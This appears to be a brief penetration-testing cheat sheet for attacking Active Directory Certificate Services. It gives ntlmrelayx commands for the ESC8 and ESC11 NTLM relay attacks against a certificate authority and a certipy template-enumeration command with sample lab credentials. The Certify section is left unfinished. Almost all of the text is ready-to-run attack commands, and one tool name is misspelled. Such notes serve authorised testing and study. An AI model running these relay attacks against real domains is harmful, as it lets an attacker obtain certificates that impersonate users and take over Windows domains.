ADCS
Certified Pre-Owned
ESC 8
powershell
ntlmrelayx.py -t http://<ca-name>/certsrv/ -smb2support --adcs --template <VULN-TEMPLATE-NAME>ESC 11
powershell
ntlmrealayx.py -t rpc://ca.domain.local --template <Template-Name> -rpc-mode ICPR -icpr-ca-name <CA-NAME> -smb2support -debugcertipy
Enumerate certificate templates from Active Directory Environment.
Flags are:
- -u username@domain
- -p password
- -dc-ip Domain Controller IP address
- -enabled only shows enabled templates
- -hide-admins Don't show administrator permissions
certipy find \
-u 'attacker@lab.internal' -p 'Passw0rd!' \
-dc-ip '10.0.0.100' -text \
-enabled -hide-adminscertify
TODO